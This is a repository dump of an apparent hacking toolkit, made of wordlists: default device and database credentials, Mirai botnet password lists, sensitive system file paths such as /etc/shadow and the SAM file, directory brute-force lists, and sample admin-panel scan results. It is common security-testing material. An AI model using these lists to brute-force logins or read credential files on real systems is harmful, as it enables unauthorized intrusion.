├── wordlists ├── metasploit │ ├── vnc_passwords.txt │ ├── idrac_default_user.txt │ ├── multi_vendor_cctv_dvr_users.txt │ ├── idrac_default_pass.txt │ ├── postgres_default_user.txt │ ├── postgres_default_pass.txt │ ├── can_flood_frames.txt │ ├── db2_default_user.txt │ ├── ipmi_users.txt │ ├── rservices_from_users.txt │ ├── tomcat_mgr_default_users.txt │ ├── tomcat_mgr_default_pass.txt │ ├── password.lst │ ├── postgres_default_userpass.txt │ ├── vxworks_common_20.txt │ ├── vxworks_collide_20.txt │ ├── db2_default_pass.txt │ ├── lync_subdomains.txt │ ├── http_owa_common.txt │ ├── db2_default_userpass.txt │ ├── sap_common.txt │ ├── http_default_users.txt │ ├── mirai_user.txt │ ├── tomcat_mgr_default_userpass.txt │ ├── sensitive_files_win.txt │ ├── http_default_pass.txt │ ├── http_default_userpass.txt │ ├── keyboard-patterns.txt │ ├── sensitive_files.txt │ ├── cms400net_default_userpass.txt │ ├── named_pipes.txt │ ├── mirai_pass.txt │ ├── dlink_telnet_backdoor_userpass.txt │ ├── sap_default.txt │ ├── multi_vendor_cctv_dvr_pass.txt │ ├── av-update-urls.txt │ ├── root_userpass.txt │ ├── mirai_user_pass.txt │ ├── scada_default_userpass.txt │ ├── adobe_top100_pass.txt │ ├── unix_users.txt │ ├── snmp_default_pass.txt │ ├── hci_oracle_passwords.csv │ ├── dangerzone_b.txt │ ├── tftp.txt │ ├── burnett_top_500.txt │ ├── sid.txt │ ├── routers_userpass.txt │ └── oracle_default_userpass.txt ├── dirb │ ├── big.txt │ ├── indexes.txt │ ├── stress │ │ ├── char.txt │ │ ├── alphanum_case.txt │ │ ├── alphanum_case_extra.txt │ │ ├── uri_hex.txt │ │ └── doble_uri_hex.txt │ ├── others │ │ ├── best15.txt │ │ └── best110.txt │ ├── extensions_common.txt │ ├── vulns │ │ ├── axis.txt │ │ ├── jrun.txt │ │ ├── apache.txt │ │ ├── tests.txt │ │ ├── jboss.txt │ │ ├── iplanet.txt │ │ ├── frontpage.txt │ │ ├── netware.txt │ │ ├── iis.txt │ │ ├── coldfusion.txt │ │ ├── vignette.txt │ │ ├── sunas.txt │ │ ├── fatwire.txt │ │ ├── tomcat.txt │ │ ├── jersey.txt │ │ ├── ror.txt │ │ ├── hpsmh.txt │ │ ├── domino.txt │ │ └── weblogic.txt │ ├── mutations_common.txt │ ├── catala.txt │ ├── euskera.txt │ └── spanish.txt ├── wfuzz │ ├── general │ │ ├── big.txt │ │ ├── medium.txt │ │ ├── test.txt │ │ ├── extensions_common.txt │ │ ├── http_methods.txt │ │ ├── euskera.txt │ │ ├── mutations_common.txt │ │ ├── catala.txt │ │ ├── spanish.txt │ │ └── admin-panels.txt │ ├── Injections │ │ ├── bad_chars.txt │ │ ├── XML.txt │ │ ├── SQL.txt │ │ ├── XSS.txt │ │ └── Traversal.txt │ ├── stress │ │ ├── char.txt │ │ ├── alphanum_case.txt │ │ ├── alphanum_case_extra.txt │ │ ├── uri_hex.txt │ │ └── doble_uri_hex.txt │ ├── webservices │ │ ├── ws-files.txt │ │ └── ws-dirs.txt │ ├── vulns │ │ ├── netware.txt │ │ ├── jrun.txt │ │ ├── apache.txt │ │ ├── tests.txt │ │ ├── oracle9i.txt │ │ ├── iplanet.txt │ │ ├── frontpage.txt │ │ ├── iis.txt │ │ ├── sql_inj.txt │ │ ├── coldfusion.txt │ │ ├── vignette.txt │ │ ├── fatwire.txt │ │ ├── sunas.txt │ │ ├── tomcat.txt │ │ ├── weblogic.txt │ │ ├── domino.txt │ │ └── websphere.txt │ └── others │ │ └── common_pass.txt ├── dirbuster │ └── directories.jbrofuzz ├── fasttrack.txt └── fern-wifi │ └── common.txt ├── screenshots ├── login.png ├── settings.png ├── cmsfinder.png ├── iphistory.png ├── main-menu.png ├── adminpanelfinder.png ├── iphistoryresults.png └── adminpanelfinderresults.png ├── results └── testprojectname │ ├── cmsversion.txt │ └── adminpanelfinder.txt ├── requirements.txt ├── settings.cfg ├── README.md ├── xctr.py └── proxy.txt /wordlists/metasploit/vnc_passwords.txt: -------------------------------------------------------------------------------- 1 | password 2 | -------------------------------------------------------------------------------- /wordlists/metasploit/idrac_default_user.txt: -------------------------------------------------------------------------------- 1 | root 2 | user1 3 | admin 4 | -------------------------------------------------------------------------------- /wordlists/metasploit/multi_vendor_cctv_dvr_users.txt: -------------------------------------------------------------------------------- 1 | admin 2 | user 3 | -------------------------------------------------------------------------------- /wordlists/metasploit/idrac_default_pass.txt: -------------------------------------------------------------------------------- 1 | calvin 2 | 123456 3 | password 4 | -------------------------------------------------------------------------------- /wordlists/metasploit/postgres_default_user.txt: -------------------------------------------------------------------------------- 1 | 2 | postgres 3 | scott 4 | admin 5 | -------------------------------------------------------------------------------- /wordlists/metasploit/postgres_default_pass.txt: -------------------------------------------------------------------------------- 1 | 2 | tiger 3 | postgres 4 | password 5 | admin 6 | -------------------------------------------------------------------------------- /wordlists/metasploit/can_flood_frames.txt: -------------------------------------------------------------------------------- 1 | 244+0000009999 2 | 188+030000 3 | 19b+00000F 4 | 19b+000010 -------------------------------------------------------------------------------- /wordlists/metasploit/db2_default_user.txt: -------------------------------------------------------------------------------- 1 | db2inst1 2 | dasusr1 3 | db2fenc1 4 | admin 5 | db2admin 6 | -------------------------------------------------------------------------------- /screenshots/login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/screenshots/login.png -------------------------------------------------------------------------------- /wordlists/dirb/big.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/wordlists/dirb/big.txt -------------------------------------------------------------------------------- /screenshots/settings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/screenshots/settings.png -------------------------------------------------------------------------------- /wordlists/metasploit/ipmi_users.txt: -------------------------------------------------------------------------------- 1 | ADMIN 2 | admin 3 | root 4 | Administrator 5 | USERID 6 | guest 7 | Admin 8 | -------------------------------------------------------------------------------- /wordlists/metasploit/rservices_from_users.txt: -------------------------------------------------------------------------------- 1 | root 2 | daemon 3 | bin 4 | nobody 5 | + 6 | guest 7 | mail 8 | -------------------------------------------------------------------------------- /wordlists/metasploit/tomcat_mgr_default_users.txt: -------------------------------------------------------------------------------- 1 | admin 2 | manager 3 | role1 4 | root 5 | tomcat 6 | both 7 | -------------------------------------------------------------------------------- /screenshots/cmsfinder.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/screenshots/cmsfinder.png -------------------------------------------------------------------------------- /screenshots/iphistory.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/screenshots/iphistory.png -------------------------------------------------------------------------------- /screenshots/main-menu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/screenshots/main-menu.png -------------------------------------------------------------------------------- /wordlists/metasploit/tomcat_mgr_default_pass.txt: -------------------------------------------------------------------------------- 1 | admin 2 | manager 3 | role1 4 | root 5 | tomcat 6 | s3cret 7 | vagrant 8 | -------------------------------------------------------------------------------- /screenshots/adminpanelfinder.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/screenshots/adminpanelfinder.png -------------------------------------------------------------------------------- /screenshots/iphistoryresults.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/screenshots/iphistoryresults.png -------------------------------------------------------------------------------- /wordlists/wfuzz/general/big.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/wordlists/wfuzz/general/big.txt -------------------------------------------------------------------------------- /wordlists/metasploit/password.lst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/wordlists/metasploit/password.lst -------------------------------------------------------------------------------- /wordlists/wfuzz/general/medium.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/wordlists/wfuzz/general/medium.txt -------------------------------------------------------------------------------- /screenshots/adminpanelfinderresults.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/screenshots/adminpanelfinderresults.png -------------------------------------------------------------------------------- /wordlists/dirb/indexes.txt: -------------------------------------------------------------------------------- 1 | default 2 | home 3 | index 4 | menu 5 | main 6 | start 7 | localstart 8 | inicio 9 | indice 10 | base 11 | -------------------------------------------------------------------------------- /wordlists/dirbuster/directories.jbrofuzz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/wordlists/dirbuster/directories.jbrofuzz -------------------------------------------------------------------------------- /wordlists/metasploit/postgres_default_userpass.txt: -------------------------------------------------------------------------------- 1 | postgres postgres 2 | postgres password 3 | postgres admin 4 | admin admin 5 | admin password 6 | -------------------------------------------------------------------------------- /wordlists/metasploit/vxworks_common_20.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/wordlists/metasploit/vxworks_common_20.txt -------------------------------------------------------------------------------- /wordlists/wfuzz/Injections/bad_chars.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/wordlists/wfuzz/Injections/bad_chars.txt -------------------------------------------------------------------------------- /wordlists/metasploit/vxworks_collide_20.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/capture0x/XCTR-Hacking-Tools/HEAD/wordlists/metasploit/vxworks_collide_20.txt -------------------------------------------------------------------------------- /wordlists/metasploit/db2_default_pass.txt: -------------------------------------------------------------------------------- 1 | db2inst1 2 | dasusr1 3 | db2fenc1 4 | db2pass 5 | db2pw 6 | db2password 7 | admin 8 | db2admin 9 | 10 | -------------------------------------------------------------------------------- /wordlists/wfuzz/general/test.txt: -------------------------------------------------------------------------------- 1 | classes 2 | css 3 | docs 4 | environment 5 | images 6 | includes 7 | master 8 | prueba 9 | scripts 10 | test 11 | -------------------------------------------------------------------------------- /results/testprojectname/cmsversion.txt: -------------------------------------------------------------------------------- 1 | 2 | https://xxxx.com/ 3 | Spyropress 3.7.0 4 | https://xxxx.com/ 5 | Powered by Visual Composer - drag and drop page builder for WordPress. -------------------------------------------------------------------------------- /wordlists/metasploit/lync_subdomains.txt: -------------------------------------------------------------------------------- 1 | access 2 | dialin 3 | lync 4 | lync10 5 | lyncaccess 6 | lyncaccess01 7 | lyncdiscover 8 | lyncext 9 | lyncweb 10 | meet 11 | -------------------------------------------------------------------------------- /wordlists/metasploit/http_owa_common.txt: -------------------------------------------------------------------------------- 1 | aspnet_client/ 2 | Autodiscover/ 3 | exchange/ 4 | ecp/ 5 | EWS/ 6 | Microsoft-Server-ActiveSync/ 7 | OAB/ 8 | PowerShell/ 9 | Rpc/ 10 | -------------------------------------------------------------------------------- /wordlists/metasploit/db2_default_userpass.txt: -------------------------------------------------------------------------------- 1 | db2inst1 db2inst1 2 | db2inst1 db2pass 3 | db2inst1 db2pw 4 | db2inst1 db2password 5 | dasusr1 dasusr1 6 | db2fenc1 db2fenc1 7 | db2admin db2admin 8 | 9 | -------------------------------------------------------------------------------- /wordlists/metasploit/sap_common.txt: -------------------------------------------------------------------------------- 1 | sapservice 2 | sapadm 3 | adm 4 | sqd 5 | sapdb 6 | 7 | sapservice 8 | sapr3 9 | sapsr3 10 | ora 11 | -------------------------------------------------------------------------------- /wordlists/metasploit/http_default_users.txt: -------------------------------------------------------------------------------- 1 | admin 2 | manager 3 | root 4 | cisco 5 | apc 6 | pass 7 | security 8 | user 9 | system 10 | sys 11 | wampp 12 | newuser 13 | xampp-dav-unsecure 14 | vagrant -------------------------------------------------------------------------------- /wordlists/dirb/stress/char.txt: -------------------------------------------------------------------------------- 1 | a 2 | b 3 | c 4 | d 5 | e 6 | f 7 | g 8 | h 9 | i 10 | j 11 | k 12 | l 13 | m 14 | n 15 | o 16 | p 17 | q 18 | r 19 | s 20 | t 21 | u 22 | v 23 | w 24 | x 25 | y 26 | z 27 | -------------------------------------------------------------------------------- /wordlists/dirb/others/best15.txt: -------------------------------------------------------------------------------- 1 | 111111 2 | 1234 3 | 12345 4 | 123456 5 | 1234567 6 | 12345678 7 | abc123 8 | dragon 9 | iloveyou 10 | letmein 11 | monkey 12 | password 13 | qwerty 14 | tequiero 15 | test 16 | -------------------------------------------------------------------------------- /wordlists/wfuzz/stress/char.txt: -------------------------------------------------------------------------------- 1 | a 2 | b 3 | c 4 | d 5 | e 6 | f 7 | g 8 | h 9 | i 10 | j 11 | k 12 | l 13 | m 14 | n 15 | o 16 | p 17 | q 18 | r 19 | s 20 | t 21 | u 22 | v 23 | w 24 | x 25 | y 26 | z 27 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | beautifulsoup4==4.8.2 2 | bs4==0.0.1 3 | certifi==2019.11.28 4 | chardet==3.0.4 5 | idna==2.9 6 | lxml==4.5.0 7 | requests==2.23.0 8 | soupsieve==1.9.5 9 | sty==1.0.0b12 10 | urllib3==1.25.8 11 | -------------------------------------------------------------------------------- /wordlists/metasploit/mirai_user.txt: -------------------------------------------------------------------------------- 1 | 666666 2 | 888888 3 | admin 4 | admin1 5 | administrator 6 | Administrator 7 | guest 8 | mother 9 | root 10 | service 11 | supervisor 12 | support 13 | tech 14 | ubnt 15 | user 16 | -------------------------------------------------------------------------------- /wordlists/metasploit/tomcat_mgr_default_userpass.txt: -------------------------------------------------------------------------------- 1 | j2deployer j2deployer 2 | ovwebusr OvW*busr1 3 | cxsdk kdsxc 4 | root owaspbwa 5 | ADMIN ADMIN 6 | xampp xampp 7 | tomcat s3cret 8 | QCC QLogic66 9 | admin vagrant 10 | -------------------------------------------------------------------------------- /wordlists/metasploit/sensitive_files_win.txt: -------------------------------------------------------------------------------- 1 | C:\boot.ini 2 | C:\config.sys 3 | C:\autoexec.bat 4 | C:\Windows\system32\drivers\etc\hosts 5 | C:\winnt\system32\drivers\etc\hosts 6 | C:\Windows\system32\config\SAM 7 | C:\winnt\system32\config\SAM 8 | -------------------------------------------------------------------------------- /wordlists/wfuzz/webservices/ws-files.txt: -------------------------------------------------------------------------------- 1 | 2 | .asmx 3 | .asmx?wsdl 4 | .aspx 5 | .atom 6 | .disco 7 | .html 8 | .java 9 | .jsp 10 | .jws 11 | .jws?wsdl 12 | .php 13 | .pl 14 | .py 15 | .rss 16 | .svc 17 | .wsdl 18 | ?disco 19 | ?wsdl 20 | -------------------------------------------------------------------------------- /wordlists/metasploit/http_default_pass.txt: -------------------------------------------------------------------------------- 1 | admin 2 | password 3 | manager 4 | letmein 5 | cisco 6 | default 7 | root 8 | apc 9 | pass 10 | security 11 | user 12 | system 13 | sys 14 | none 15 | xampp 16 | wampp 17 | ppmax2011 18 | turnkey 19 | vagrant -------------------------------------------------------------------------------- /wordlists/metasploit/http_default_userpass.txt: -------------------------------------------------------------------------------- 1 | connect connect 2 | sitecom sitecom 3 | admin 1234 4 | cisco cisco 5 | cisco sanfran 6 | private private 7 | wampp xampp 8 | newuser wampp 9 | xampp-dav-unsecure ppmax2011 10 | admin turnkey 11 | vagrant vagrant -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/netware.txt: -------------------------------------------------------------------------------- 1 | ICHAINErrors 2 | ICSLogin 3 | ICHAINLogout 4 | ICSIBroker 5 | NetStorage 6 | iManager 7 | eMFrame 8 | oneNet 9 | ICHAIN 10 | ICS 11 | NSearch 12 | SearchServlet 13 | site 14 | home.html 15 | iFolder 16 | update 17 | webacc 18 | nps 19 | -------------------------------------------------------------------------------- /settings.cfg: -------------------------------------------------------------------------------- 1 | [general] 2 | threadnumber = 500 3 | siteurl = https://google.com.tr 4 | siteport = 8080 5 | wordlistdirectory = wordlists 6 | cwordlist = /home/user/Desktop/xctr-hacking-tools/wordlists/wfuzz/general/admin-panels.txt 7 | resultdirectory = results 8 | projectname = testprojectname 9 | 10 | -------------------------------------------------------------------------------- /wordlists/metasploit/keyboard-patterns.txt: -------------------------------------------------------------------------------- 1 | qwerty 2 | qwertyuiop 3 | 1qaz2wsx 4 | qazwsx 5 | asdfgh 6 | zxcvbnm 7 | 1234qwer 8 | q1w2e3r4t5 9 | qwer1234 10 | q1w2e3r4 11 | asdfasdf 12 | qazwsxedc 13 | asdfghjkl 14 | q1w2e3 15 | 1qazxsw2 16 | 12QWaszx 17 | qweasdzxc 18 | mnbvcxz 19 | a1b2c3d4 20 | adgjmptw 21 | -------------------------------------------------------------------------------- /wordlists/dirb/extensions_common.txt: -------------------------------------------------------------------------------- 1 | 2 | .asp 3 | .aspx 4 | .bat 5 | .c 6 | .cfm 7 | .cgi 8 | .com 9 | .dll 10 | .exe 11 | .htm 12 | .html 13 | .inc 14 | .jhtml 15 | .jsa 16 | .jsp 17 | .log 18 | .mdb 19 | .nsf 20 | .php 21 | .phtml 22 | .pl 23 | .reg 24 | .sh 25 | .shtml 26 | .sql 27 | .txt 28 | .xml 29 | / 30 | -------------------------------------------------------------------------------- /wordlists/wfuzz/general/extensions_common.txt: -------------------------------------------------------------------------------- 1 | / 2 | .asp 3 | .aspx 4 | .bat 5 | .c 6 | .cfm 7 | .cgi 8 | .com 9 | .dll 10 | .exe 11 | .htm 12 | .html 13 | .inc 14 | .jhtml 15 | .jsa 16 | .jsp 17 | .log 18 | .mdb 19 | .nsf 20 | .php 21 | .phtml 22 | .pl 23 | .reg 24 | .sh 25 | .shtml 26 | .sql 27 | .txt 28 | .xml 29 | -------------------------------------------------------------------------------- /wordlists/metasploit/sensitive_files.txt: -------------------------------------------------------------------------------- 1 | /etc/passwd 2 | /etc/shadow 3 | /etc/group 4 | /etc/groups 5 | /etc/mysql.conf 6 | /etc/mysql/my.cnf 7 | /etc/hosts 8 | /etc/hosts.allow 9 | /etc/hosts.deny 10 | /etc/php.ini 11 | /etc/issue 12 | /etc/motd 13 | /etc/fstab 14 | /etc/inetd.conf 15 | /etc/xinetd.conf 16 | /proc/version 17 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/axis.txt: -------------------------------------------------------------------------------- 1 | *.jws 2 | AdminServlet 3 | AxisServlet 4 | EchoHeaders.jws 5 | SOAPMonitor 6 | StockQuoteService.jws 7 | fingerprint.jsp 8 | happyaxis.jsp 9 | i18nLib.jsp 10 | index.html 11 | index.jsp 12 | index.jws 13 | services 14 | services/* 15 | servlet 16 | servlet/AdminServlet 17 | servlet/AxisServlet 18 | -------------------------------------------------------------------------------- /wordlists/metasploit/cms400net_default_userpass.txt: -------------------------------------------------------------------------------- 1 | admin admin 2 | builtin builtin 3 | jedit jedit 4 | jmember jmember 5 | Admin2 Admin2 6 | tbrown tbrown 7 | jsmith jsmith 8 | vs vs 9 | EkExplorerUser EkExplorerUser 10 | Explorer Explorer 11 | member@example.com member@example.com 12 | north north 13 | supermember supermember 14 | west west 15 | -------------------------------------------------------------------------------- /results/testprojectname/adminpanelfinder.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | ------------------------------------------------------------------------ 5 | Domain: https://xxxx.com/ 6 | Wordlist: /home/user/Desktop/xctr-hacking-tools/wordlists/wfuzz/general/admin-panels.txt 7 | ------------------------------------------------------------------------ 8 | https://xxxx.com/admin/ 9 | https://xxxx.com/admin/index.php -------------------------------------------------------------------------------- /wordlists/dirb/vulns/jrun.txt: -------------------------------------------------------------------------------- 1 | SmarTicketApp/index.html 2 | WEB-INF/webapp.properties 3 | WEB-INF/web.xml 4 | compass/logon.jsp 5 | databasenotes.html 6 | flash/java/javabean/FlashJavaBean.html 7 | jrunscripts 8 | jstl-war/index.html 9 | techniques/servlets/index.html 10 | travelnet/home.jsp 11 | worldmusic/action/cdlist 12 | worldmusic/action/catalog 13 | ws-client/loanCalculation.jsp 14 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/jrun.txt: -------------------------------------------------------------------------------- 1 | SmarTicketApp/index.html 2 | WEB-INF/webapp.properties 3 | WEB-INF/web.xml 4 | compass/logon.jsp 5 | databasenotes.html 6 | flash/java/javabean/FlashJavaBean.html 7 | jrunscripts 8 | jstl-war/index.html 9 | techniques/servlets/index.html 10 | travelnet/home.jsp 11 | worldmusic/action/cdlist 12 | worldmusic/action/catalog 13 | ws-client/loanCalculation.jsp 14 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/apache.txt: -------------------------------------------------------------------------------- 1 | .htaccess 2 | .htpasswd 3 | .meta 4 | .web 5 | access_log 6 | cgi 7 | cgi-bin 8 | cgi-pub 9 | cgi-script 10 | dummy 11 | error 12 | error_log 13 | htdocs 14 | httpd 15 | httpd.pid 16 | icons 17 | index.html 18 | logs 19 | manual 20 | phf 21 | printenv 22 | server-info 23 | server-status 24 | status 25 | test-cgi 26 | tmp 27 | ~bin 28 | ~ftp 29 | ~nobody 30 | ~root 31 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/apache.txt: -------------------------------------------------------------------------------- 1 | .htaccess 2 | .htpasswd 3 | .meta 4 | .web 5 | access_log 6 | cgi 7 | cgi-bin 8 | cgi-pub 9 | cgi-script 10 | dummy 11 | error 12 | error_log 13 | htdocs 14 | httpd 15 | httpd.pid 16 | icons 17 | index.html 18 | logs 19 | manual 20 | phf 21 | printenv 22 | server-info 23 | server-status 24 | status 25 | test-cgi 26 | tmp 27 | ~bin 28 | ~ftp 29 | ~nobody 30 | ~root 31 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/tests.txt: -------------------------------------------------------------------------------- 1 | test 2 | test1 3 | test2 4 | test00 5 | test01 6 | tests 7 | testing 8 | tst 9 | tsts 10 | probando 11 | prueba 12 | prueba1 13 | prueba2 14 | prueba00 15 | prueba01 16 | pruebas 17 | prova 18 | prova1 19 | prova2 20 | provas 21 | TEST 22 | TESTS 23 | Test 24 | Tests 25 | tester 26 | Pruebas 27 | PRUEBA 28 | PRUEBAS 29 | Prova 30 | Provas 31 | demo 32 | DEMO 33 | Demo 34 | 35 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/tests.txt: -------------------------------------------------------------------------------- 1 | test 2 | test1 3 | test2 4 | test00 5 | test01 6 | tests 7 | testing 8 | tst 9 | tsts 10 | probando 11 | prueba 12 | prueba1 13 | prueba2 14 | prueba00 15 | prueba01 16 | pruebas 17 | prova 18 | prova1 19 | prova2 20 | provas 21 | TEST 22 | TESTS 23 | Test 24 | Tests 25 | tester 26 | Pruebas 27 | PRUEBA 28 | PRUEBAS 29 | Prova 30 | Provas 31 | demo 32 | DEMO 33 | Demo 34 | 35 | -------------------------------------------------------------------------------- /wordlists/metasploit/named_pipes.txt: -------------------------------------------------------------------------------- 1 | netlogon 2 | lsarpc 3 | samr 4 | browser 5 | atsvc 6 | DAV RPC SERVICE 7 | epmapper 8 | eventlog 9 | InitShutdown 10 | keysvc 11 | lsass 12 | LSM_API_service 13 | ntsvcs 14 | plugplay 15 | protected_storage 16 | router 17 | SapiServerPipeS-1-5-5-0-70123 18 | scerpc 19 | srvsvc 20 | tapsrv 21 | trkwks 22 | W32TIME_ALT 23 | wkssvc 24 | PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER 25 | db2remotecmd 26 | -------------------------------------------------------------------------------- /wordlists/wfuzz/general/http_methods.txt: -------------------------------------------------------------------------------- 1 | ACL 2 | CHECKIN 3 | CHECKOUT 4 | CONNECT 5 | COPY 6 | DELETE 7 | GET 8 | HEAD 9 | INDEX 10 | LINK 11 | LOCK 12 | MKCOL 13 | MOVE 14 | NOEXISTE 15 | OPTIONS 16 | ORDERPATCH 17 | PATCH 18 | POST 19 | PROPFIND 20 | PROPPATCH 21 | PUT 22 | REPORT 23 | SEARCH 24 | SHOWMETHOD 25 | SPACEJUMP 26 | TEXTSEARCH 27 | TRACE 28 | TRACK 29 | UNCHECKOUT 30 | UNLINK 31 | UNLOCK 32 | VERSION-CONTROL 33 | -------------------------------------------------------------------------------- /wordlists/dirb/stress/alphanum_case.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 1 3 | 2 4 | 3 5 | 4 6 | 5 7 | 6 8 | 7 9 | 8 10 | 9 11 | a 12 | b 13 | c 14 | d 15 | e 16 | f 17 | g 18 | h 19 | i 20 | j 21 | k 22 | l 23 | m 24 | n 25 | o 26 | p 27 | q 28 | r 29 | s 30 | t 31 | u 32 | v 33 | w 34 | x 35 | y 36 | z 37 | A 38 | B 39 | C 40 | D 41 | E 42 | F 43 | G 44 | H 45 | I 46 | J 47 | K 48 | L 49 | M 50 | N 51 | O 52 | P 53 | Q 54 | R 55 | S 56 | T 57 | U 58 | V 59 | W 60 | X 61 | Y 62 | Z 63 | -------------------------------------------------------------------------------- /wordlists/wfuzz/stress/alphanum_case.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 1 3 | 2 4 | 3 5 | 4 6 | 5 7 | 6 8 | 7 9 | 8 10 | 9 11 | a 12 | b 13 | c 14 | d 15 | e 16 | f 17 | g 18 | h 19 | i 20 | j 21 | k 22 | l 23 | m 24 | n 25 | o 26 | p 27 | q 28 | r 29 | s 30 | t 31 | u 32 | v 33 | w 34 | x 35 | y 36 | z 37 | A 38 | B 39 | C 40 | D 41 | E 42 | F 43 | G 44 | H 45 | I 46 | J 47 | K 48 | L 49 | M 50 | N 51 | O 52 | P 53 | Q 54 | R 55 | S 56 | T 57 | U 58 | V 59 | W 60 | X 61 | Y 62 | Z 63 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/oracle9i.txt: -------------------------------------------------------------------------------- 1 | CookieExample 2 | Counter 3 | DateServlet 4 | HelloWorldServlet 5 | RequestParamExample 6 | SessionExample 7 | SessionServlet 8 | SimpleServlet 9 | SnoopServlet 10 | basic 11 | cal 12 | cgi-bin 13 | echo 14 | examples 15 | fcgi-bin 16 | hellouser 17 | hellouser.jsp 18 | j2ee 19 | jsp 20 | login.html 21 | ojspdemos 22 | perl 23 | printenv 24 | servlet 25 | simple 26 | snoop.jsp 27 | snp 28 | usebean.jsp 29 | welcomeuser.jsp 30 | -------------------------------------------------------------------------------- /wordlists/wfuzz/general/euskera.txt: -------------------------------------------------------------------------------- 1 | administrazio 2 | administrazioa 3 | argitalpenak 4 | artxiboa 5 | ataria 6 | aupa 7 | aurrera 8 | bai 9 | berri 10 | bidali 11 | bilatu 12 | buzoia 13 | dataz 14 | dokumentuak 15 | egutegia 16 | erreala 17 | ez 18 | fitxategia 19 | foru 20 | gestio 21 | gidak 22 | gora 23 | hasi 24 | hizkuntza 25 | ikusi 26 | informazio 27 | loturak 28 | makusi 29 | mezuak 30 | oharra 31 | proiektua 32 | saioa 33 | sustapena 34 | taula 35 | txostena 36 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/jboss.txt: -------------------------------------------------------------------------------- 1 | invoker/ 2 | invoker/EJBInvokerServlet 3 | invoker/JMXInvokerServlet 4 | jbossmq-httpil/ 5 | jbossws/services 6 | jmx-console 7 | jmx-console/ 8 | jmx-console/HtmlAdaptor 9 | status 10 | web-console 11 | web-console/ 12 | web-console/AOPBinding.jsp 13 | web-console/Invoker 14 | web-console/ServerInfo.jsp 15 | web-console/SysProperties.jsp 16 | web-console/WebModule.jsp 17 | web-console/applet.jsp 18 | web-console/listMonitors.jsp 19 | web-console/status 20 | -------------------------------------------------------------------------------- /wordlists/wfuzz/general/mutations_common.txt: -------------------------------------------------------------------------------- 1 | ~ 2 | .001 3 | .002 4 | .1 5 | .2 6 | .7z 7 | .back 8 | .backup 9 | .bak 10 | .bakup 11 | .bas 12 | .bz2 13 | .c 14 | .conf 15 | .copia 16 | .core 17 | .cpp 18 | .dat 19 | .db 20 | .default 21 | .dll 22 | .doc 23 | .ini 24 | .jar 25 | .java 26 | .old 27 | .orig 28 | .pas 29 | .rar 30 | .sav 31 | .saved 32 | .source 33 | .src 34 | .stackdump 35 | .tar 36 | .tar.gz 37 | .temp 38 | .test 39 | .tgz 40 | .tmp 41 | .txt 42 | .war 43 | .Z 44 | .zip 45 | -------------------------------------------------------------------------------- /wordlists/dirb/mutations_common.txt: -------------------------------------------------------------------------------- 1 | .001 2 | .002 3 | .1 4 | .2 5 | .7z 6 | .Z 7 | .back 8 | .backup 9 | .bak 10 | .bakup 11 | .bas 12 | .bz2 13 | .c 14 | .conf 15 | .copia 16 | .core 17 | .cpp 18 | .dat 19 | .db 20 | .default 21 | .dll 22 | .doc 23 | .ini 24 | .jar 25 | .java 26 | .old 27 | .orig 28 | .pas 29 | .rar 30 | .sav 31 | .saved 32 | .source 33 | .src 34 | .stackdump 35 | .tar 36 | .tar.gz 37 | .temp 38 | .test 39 | .tgz 40 | .tmp 41 | .txt 42 | .war 43 | .zip 44 | ~ 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /wordlists/metasploit/mirai_pass.txt: -------------------------------------------------------------------------------- 1 | 2 | 00000000 3 | 1111 4 | 1111111 5 | 1234 6 | 12345 7 | 123456 8 | 54321 9 | 666666 10 | 7ujMko0admin 11 | 7ujMko0vizxv 12 | 888888 13 | admin 14 | admin1234 15 | anko 16 | default 17 | dreambox 18 | fucker 19 | guest 20 | hi3518 21 | ikwb 22 | juantech 23 | jvbzd 24 | klv123 25 | klv1234 26 | meinsm 27 | pass 28 | password 29 | realtek 30 | root 31 | service 32 | smcadmin 33 | supervisor 34 | support 35 | system 36 | tech 37 | ubnt 38 | user 39 | vizxv 40 | xc3511 41 | xmhdipc 42 | zlxx. 43 | Zte521 44 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/iplanet.txt: -------------------------------------------------------------------------------- 1 | ?Publisher 2 | 